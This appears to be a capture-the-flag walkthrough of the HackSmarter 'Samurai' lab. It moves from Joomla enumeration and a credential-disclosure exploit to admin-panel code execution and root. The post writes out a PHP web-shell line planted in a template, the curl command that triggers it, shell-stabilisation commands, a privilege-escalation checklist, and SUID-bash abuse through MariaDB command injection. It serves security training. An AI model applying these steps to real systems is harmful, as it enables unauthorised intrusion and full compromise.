Post

HackSmarter Samurai Walkthrough

Posted Updated
By Elmehdi Laassiri
6 min read

Summary :

In this lab, we start by enumerating the target and discovering that it is running Joomla. Using joomscan, we identify the exact version and find a known unauthenticated information disclosure vulnerability (CVE-51334) that allows us to dump credentials from the database. We use those credentials to log in to the Joomla admin panel and achieve Remote Code Execution by modifying a template file. From there, we get a reverse shell as www-data and stabilize it. During privilege escalation, we discover that our user can run MariaDB as root without a password. We abuse a command injection vulnerability in the database name parameter to execute commands as root, set the SUID bit on /bin/bash, and finally use GTFOBins to spawn a root shell and capture the flag.

Enumeration :

First thing we start with an nmap scan :

image

We see 2 ports open , SSH and 80 , let’s visit the website :

image

Nothing really useful just a simple static web page , source code doesn’t hold any sensitive information , all we can really do is FUZZ for other endpoints , start with directories , then files then subdomains .

image

Now we do find multiple Plugins and themese , so definelty a CMS is in place , we find that it is using Joomla .

image

Most directories return 404 or blank pages , but we do find the Admin portal :

image

Tried common usernames and password but it didn’t work . Now let’s use a tool to scan the website , maybe we will get a version or something , for this i will be using joomscan :

1
2

sudo apt install joomscan 
joomscan -u http://$target

image

Exploitation :

Great now we got the version , if we search for exploits for this specific version , we will find this one

https://www.exploit-db.com/exploits/51334

Which is a unauthenticated Information Disclosure that we can use to dump credentials and use them to login .

image

Now to use if we first need to install some gems , you will find them all at the top of the exploit .

1
2
3
4

vim exploit.rb ==> Then paste your exploit
chmod +x exploit.rb 
sudo gem install paint httpx docopt paint
./exploit.rb

image

Now we just use it and provide the URL :

image

And just like that we are dump the username and DB Password , we can try the username Miyamoto with the DB Password to see if we can login , and we do .

Now first thing we should think about is how to get an RCE from the admin panel .

I already have these steps in my Web app methodology , to get an RCE :

1
2
3
4
5
6
7
8

==> Attacking Joomla : 
+ Say we brute forced the login and got admin access , we can go to : 
http://$target/administrator
+ Then we just modify a template just like with WP : 
+ Go to System then Templates then modify the error.php to add this one liner : 
system($_GET['cmd']);
+ Then a simple curl will trigger it : 
curl http://$target/templates/cassiopeia/error.php?cmd=id

image

Now a simple curl will get us RCE , now let’s try and get a full reverse Shell . for this we can use Revshell website , this time the machine already has python , but i still preferred using a bash Revershell , but you can choose anything you want (if the command doesn’t work URL encode the payload first)

image

In my case , i had some trouble due to zsh misinterpreting my payload, so i decided to put the payload on a file and host it then call it from the server and finally execute it to get our reverse shell .

image

Perfect , now all we need to do is stabilize our shell to be able to privesc easily .

1
2
3
4
5
6
7
8
9
10

python3 -c 'import pty;pty.spawn("/bin/bash")'
ssty -a : this will give us the rows and columns . 
background
stty raw -echo; fg
stty rows number_of_rows cols number_of_columns  
export TERM=xterm-256color 
PS1='\[\e[31m\]\u\[\e[96m\]@\[\e[35m\]\H\[\e[0m\]:\[\e[93m\]\w\[\e[0m\]\$'

Or : PS1='\[\e[31m\]\u\[\e[96m\]@\[\e[35m\]\H\[\e[0m\]:\[\e[93m\]\w\[\e[0m\]\$ '

image

Nice now , we ve got a stable shell we can use to privesc .

Privilege Escalation :

Before i start importing linpeas , i always like testing things manually first , for websites that are running CMS , it’s always good to check config files for DB creds , but in our case we already had those. Now let’s first check for the quick wins :

1
2
3
4
5
6
7
8
9
10
11
12
13

id : Check for Groups and Which user . 
cat /etc/passwd : Check other users on the machine . 
sudo -l : which prog can be ran with root perm . 
uname -sr / lsb_relase -a : Version + architecture .  
find / -type f -perm -04000 -ls 2>/dev/null : Find binaries with SUID . 
Check for Bash History . 
If we can Write into a file and execute it as anOTher user , always put a RevShell there .
If you get Creds always test for password Reuse . 
cat /etc/fstab : if there is an nfs . 
sudo -V : check sudo version for privesc . 

# Kenrel PrivEsc : 
uname -a : Check the kernel version and check if it has privesc vectors .

We do find that our user can execute the MariaDB binary as root without requiring a password .

image

Now if we run the binary , we’re asked for a database name :

image

Since we’re dealing with DB names , let’s try some basic SQLi , first i tried calling a db that didn’t exist , which returned an error , then i commented everything else and i was able to get a valid SQLi .

image

Now let’s see if we can add the command we want to execute and comment the rest and see if we can actually have command injection as well .

image

And we do! Now we can execute anything as the root user. Let’s use that to set the SUID bit on /bin/bash and then use GTFOBins to get a root shell.

1
2

chmod +s /bin/bash ==> Make /bin/bash SUID 
bash -p : Spawn a root shell by abusing the SUID bit on bash, as documented on GTFOBins.

image

Just like that we are root , now just go to the root directory and get the flag :

image

That was everything for this Lab , hope you found it useful .

HackSmarter
Hacksmarter Easy Walkthrough Linux
This post is licensed under CC BY 4.0 by the author.